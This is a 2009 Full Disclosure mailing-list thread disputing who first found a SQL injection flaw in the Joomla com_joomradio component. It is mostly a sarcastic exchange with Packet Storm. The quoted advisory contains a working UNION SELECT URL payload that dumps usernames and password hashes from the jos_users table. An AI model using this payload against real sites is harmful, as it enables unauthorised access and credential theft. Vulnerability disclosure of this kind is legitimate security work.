Full Disclosure: Re: Joomla Component com_joomradio SQL Injection

[bobby.mugabe () hushmail com]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear gov-boi,

Please follow the established etiquette of this list by linking to
content on archive.org to establish credibility for alleged
historic content.  Linking to obscure post-dated content on your
own Internet site, that easily can be faked, isn't the best way to
attempt legitimizing your darknet archival endeavours.  Many on
this list are sceptical about your claim regarding the previous
discovery of this important computer security issue, and to be
quite frank find your attempts to discredit the king of gods'
effort to secure this critical piece of Internet infrastructure
known as the joomla joomradio something-or-other.

Mr. Zeus - on behalf of my country I would like to express our
sincere thanks for reporting this severe issue, whether or not it
was previously and independently discovered and reported, and hope
you continue to contribute your research to this list of full
disclosure and helping to make the Internet a safer place for
everyone.

I would like to remind everyone that this list is for disclosure of
information security materials and that the fascist tactics used by
the packetstorm/#darknet crowd as they attempt to once again
monopolize the dissemination of information security materials is
not appreciated here.

All the best to you and yours,
- -bm


On Wed, 18 Feb 2009 17:21:10 -0500 Packet Storm
<packet () packetstormsecurity org> wrote:
> Already discovered in June, 2008.
>
> http://packetstormsecurity.org/0806-exploits/joomlajoomradio-
> sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio
> component version 1.0 suffers from a remote SQL injection
> vulnerability.  Authored By <a
> href="mailto:His0k4.hlm[at]gmail.com";>His0k4</a>
>
> On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:
> >
> ###################################################################
> ########
> > # Advisory X
> > # Title: Joomla Component com_joomradio SQL Injection
> > # Author: 0o_zeus_o0 ( Arturo Z. )
> > # Contact: arturo_zamora_c () hotmail com
> > # Website: www.securitybroken.com
> > # Date: 18/02/09
> > # Risk: Medium
> > # Vendor Url: http://ajaxportal.eu/
> > # Affected Software: JoomRadio
> > # autor script:author XrByte <info () exp ee>, Grusha
> <grusha () feellove eu>
> >
> ##################################################################
> > #
> > #Example:
> ##################################################################
> > #htp://
> victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_r
> adio&id=-1UNION
> > SELECT
> user(),concat(username,0x3a,password),user(),user(),user(),user(),u
> ser()
> > FROM jos_users--
> > #
> ##################################################################
> > #greetz:
> > #
> > # original advisorie: http://www.securitybroken.com
> ##################################################################
>
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkmdeSAACgkQhNp8gzZx3sjQnQP8DIyQpyqWn7ItQxusiG4RvifzrUq3
MyvT2uaVgD6bagNiQo2xpBlxjfAC91ikI18ahveZUX2t1NGwvXhgE7XN4TD531cAGXAU
e4D1z+rGmFqfthaDN73PgNr6kHme1TLPszzV7SxzCiZBPaIJZxVKPP0klhZW2Ma5pdOw
DXO/Xkw=
=bmhh
-----END PGP SIGNATURE-----

--
Find schools offering psychology programs online. 3 easy steps!
 http://tagline.hushmail.com/fc/BLSrjkqkOa4cAYuqAs2Rwg48EsDoRE7w8wplgXVKoZaAmTZ8jNnakTcdLkp/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/